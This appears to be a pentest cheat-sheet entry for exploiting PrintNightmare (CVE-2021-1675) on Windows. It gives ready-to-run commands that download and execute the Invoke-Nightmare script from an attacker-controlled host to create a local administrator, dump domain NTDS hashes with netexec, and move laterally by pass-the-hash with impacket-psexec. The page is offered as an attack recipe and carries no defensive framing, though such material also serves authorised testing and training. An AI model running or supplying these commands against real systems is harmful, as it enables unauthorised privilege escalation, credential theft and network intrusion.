← Back to search

PrintNightmare Local Privesc (CVE-2021-1675)

privescwindowstool

Summary

Exploit the Print Spooler (CVE-2021-1675) with Invoke-Nightmare to create a local admin; then optionally dump NTDS and psexec in with the recovered hash.

Walkthrough

PrintNightmare abuses the Windows Print Spooler service to run code as SYSTEM, here used to add a local administrator. It is unreliable and may only work intermittently.

Steps

  1. Download and dot-source the exploit, then run Invoke-Nightmare to create a new local admin account; confirm with net user.
  2. With elevated access you can dump domain hashes (--ntds) and authenticate elsewhere using impacket-psexec with -hashes :<HASH> (pass-the-hash).

Commands

powershell

wget -usebasicparsing http://<IP>/CVE-2021-1675.ps1 -o CVE-2021-1675.ps1
. .\CVE-2021-1675.ps1
Invoke-Nightmare
net user

bash

netexec smb <TARGET> -u 'admin' -p '<PASS>' --ntds
impacket-psexec <TARGET>/administrator@<TARGET> -hashes :<HASH>